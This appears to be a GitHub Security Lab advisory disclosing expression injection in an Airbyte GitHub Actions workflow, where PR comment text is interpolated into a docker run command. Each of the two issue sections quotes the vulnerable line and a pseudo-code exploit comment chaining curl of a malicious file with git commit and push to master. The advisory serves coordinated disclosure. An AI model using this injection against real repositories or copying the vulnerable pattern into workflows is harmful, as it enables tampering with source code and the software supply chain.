skip to content
Back to
Home Research Advisories CodeQL Wall of Fame Get Involved Events
July 28, 2023

GHSL-2023-086_GHSL-2023-087: Expression injection in a GitHub Actions workflow of Airbyte

GitHub Security Lab

Coordinated Disclosure Timeline


Potential injection from the github.event.comment.body context, which may be controlled by an external user.


Airbyte repository.

Tested Version

The master branch.


Issue 1: Expression injection in Actions: .github/workflows/commands-for-testing-tool.yml: Line 111 (GHSL-2023-086)

The actions workflow file executes uncontrolled user input as part of a run command inside commands-for-testing-tool.yml. This command may allow an attacker to arbitrarily execute malicious code inside the actions runner using the permissions granted that runner.

- name: Run docker container with params
  run: docker run -v $(pwd)/secrets:/secrets -v $(pwd)/result:/result airbyte/airbyte-e2e-testing-tool:latest ${{ github.event.comment.body }}

Example exploit in PR comment (pseudo code showing that an attacker could updates the repository using the GItHub actions runner):

/run-scenario && curl [malicious file] && git add . && git commit -m "update" && git push origin develop:master


Since the workflow runs with contents: write permissions it allows for malicious modifications of the source repository.


CodeQL query here.

Issue 2: Expression injection in Actions: .github/workflows/commands-for-testing-tool.yml: Line 55 (GHSL-2023-087)

The actions workflow file executes uncontrolled user input as part of a run command inside commands-for-testing-tool.yml. This command may allow an attacker to arbitrarily execute malicious code inside the actions runner using the permissions granted that runner.

- name: Run docker container with params
  run: docker run -v $(pwd)/secrets:/secrets -v $(pwd)/result:/result airbyte/airbyte-e2e-testing-tool:latest ${{ github.event.comment.body }}

Example exploit in PR comment (pseudo code showing that an attacker could updates the repository using the GItHub actions runner):

/run-scenario && curl [malicious file] && git add . && git commit -m "update" && git push origin develop:master


Since the workflow runs with contents: write permissions it allows for malicious modifications of the source repository.


These issues were discovered and reported by GitHub employees @leftrightleft (Dan Shanahan) and @ngonz (Nick Gonzalez).


You can contact the GHSL team at, please include a reference to GHSL-2023-086 or GHSL-2023-087 in any communication regarding these issues.